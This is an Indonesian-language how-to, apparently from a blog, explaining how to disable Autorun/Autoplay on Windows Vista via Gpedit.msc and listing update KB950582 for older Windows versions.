Untuk Pengguna Windows Vista, caranya sebagai berikut :
1.    Dari Start Menu ketikkan Gpedit.msc di box Start Search lalu tekan enter ( mungkin akan di tampilkan perintah untuk memasukkan password administrator)
2.    Di bagian Computer Configuration pilih Administrative Templates lalu pilih lagi Windows Components klik Autoplay Policies
3.    Di panel Details, double klik Turn off Autoplay
4.    Klik Enabled dan pilih All drives di box Turn off Autoplay untuk me-nonaktifkan Autorun di semua drive.
5.    Restart Komputer.

Jika cara diatas tidak berhasil menon aktfkan autorun, maka kemungkinan perlu download update sesuai dengan versi windows yang digunakan. Detailnya sebagai berikut :
•    Windows XP SP2 dan SP3 (KB950582)
•    Windows Server 2003 Itanium-based Systems (KB950582)
•    Windows Server 2003 x64 Edition (KB950582)
•    Windows Server 2003 (KB950582)
•    Windows XP x64 Edition (KB950582)
•    Windows 2000 (KB950582)
More aboutMengenal Lebih Dekat Autorun.inf